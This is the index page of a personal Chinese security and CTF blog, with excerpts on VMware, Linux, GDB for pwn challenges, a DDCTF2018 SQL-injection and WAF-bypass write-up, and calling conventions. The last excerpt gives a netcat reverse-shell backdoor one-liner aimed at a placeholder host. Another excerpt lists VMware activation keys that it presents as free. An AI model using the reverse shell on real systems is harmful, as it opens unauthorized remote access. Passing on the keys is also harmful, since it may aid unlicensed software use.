Ex1t's 📜

Ex1t's 📜

share and remember

虚拟机相关
VMware要付费,VirtualBox免费。试了下觉得VMware要好用一点,而且有真香激活码可以用,为什么叫真香激活码呢,就是和微软放任盗版一样,为了占据市场份额,VMware放出来给个人用户免费使用的激活码。当然的,这个激活码不允许商业使用,不然会被送律师函。真香激活码:1234567VMware Workstation Pro 12 激活密钥5A02H-AU243-TZJ49-GTC7K-3C61NVF5XA-FNDDJ-085GZ-4NXZ9-N20E6UC5MR-8NE16-H81WY-R7QGV-QG2D8ZG1WH-ATY96-H80QP-X7PEX-Y30V4AA3E0...
Linux的杂七杂八
从高二开始接触Linux,到现在差不多有4年了,感觉之前学的东西忘了好多,所以心血来潮想把关于Linux的东西开一篇博客记下来。目前还是用虚拟机玩Linux,以前试过双系统,但是快速启动用不了而且要安Grub很烦人就换回来了。(不用Windows是不可能的,育碧、EA、G胖、暴雪还等着我交钱呢)
GDB在CTF解题中的一些使用技巧
当我拿到一道PWN题时,应该如何用GDB处理这个二进制程序。我搭建了一个最轻量版的64位Ubuntu16的虚拟机(无图形界面)用来调试PWN的二进制程序安装了GDB以及GDB的Peda插件,并且安装了32位的兼容 找到main函数CTF的PWN题一般是经过了strip的,没有符号表,也不知道函数名(但是不知道为什么IDA Pro就能识别出main函数,很奇怪,这个坑留到后面补)所以想要调试题目,最先要做的事情就是找到程序的入口函数: main 最快的方式是直接使用 r(run)指令,跑一下这个程序,程序会在输入点循环等待输入123456ubuntu@ubuntuMin:~$ gd...
DDCTF2018_WriteUp
WebWeb1 数据库的秘密这个题目是一个绕过WAF注入的题目,顺带考了一些Web的基础知识,第一次手动做WAF绕过,Mark一下题目:http://116.85.43.88:8080/UNWROBCEZRCYCMKH/dfe3ia/index.php打开提示 非法链接,只允许来自 123.232.23.245 的访问加个header:x-forwarded-for:123.232.23.245成功访问,页面为一个搜索框和数据框,看看源码发现有一个hidden的input表单项,参数为author,猜测其为注入点,进行SQL注入然后发现了WAF,一开始看到WAF是安全狗,一直去找过狗的方...
windows x64函数调用约定
借PC处理器架构由x86向x64过渡之机,MS清理了windows x64平台上的函数调用约定,由原来的数种包括stdcall,thiscall,fastcall,cdecl,pascal等,统一为一种新的fastcall调用方式。这种调用方式得益于x64平台寄存器数量的增加。    windows x64平台fastcall调用约定的主要特性如下: 前四个整型或指针类型参数由RCX,RDX,R8,R9依次传递,前四个浮点类型参数由XMM0,XMM1,XMM2,XMM3依次传递。调用函数为前四个参数在调用栈上保留相应的空间,称作shadow space或spill slot。即使被调用方...
虚拟主机的两种工作方式
WWW虚拟主机有两种工作方式: 基于IP地址的虚拟主机方式这种方式下,不同的主机名解析到不同的IP地址,提供虚拟主机服务的机器上同时设置有这些IP地址。服务器根据用户请求的目的IP地址来判定用户请求的是哪个虚拟主机的服务,从而进一步的处理。缺点:基于IP地址的虚拟主机方式需要在提供虚拟主机服务的机器上设立多个IP地址,既浪费了IP地址,又限制了一台机器所能容纳的虚拟主机数目。因此这种方式越来越少使用。但是,这种方式是早期使用的HTTP 1.0协议唯一支持的虚拟主机方式。 基于主机名的虚拟主机方式由于基于IP地址的虚拟主机方式有如上的缺点,HTTP 1.1协议中增加了对基于主机名的虚...
Requests库POST文件名为中文时出现Bug(修复方法)
具体解决如下: Inside site-packages/requests/packages/urllib3/fields.py, delete this (line ~50): value = email.utils.encode_rfc2231(value, ‘utf-8’)And change the line right underneath it to this: value = ‘%s=”%s”‘ % (name, value)This makes servers (that I’ve tested) pick up the field and process it corr...
NC reverse shell
用 NC 建立反弹型shellLinux后门之道——NC用法别有洞天 第一步,建立管道:mknod /tmp/backpipe p 或者 mkfifo /tmp/backpipe第二步,用管道将nc和/bin/sh连接起来:1root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
avatar
Ex1t
Clear Sight leads to the right road
FRIENDS
JrXnm G6 wupco spg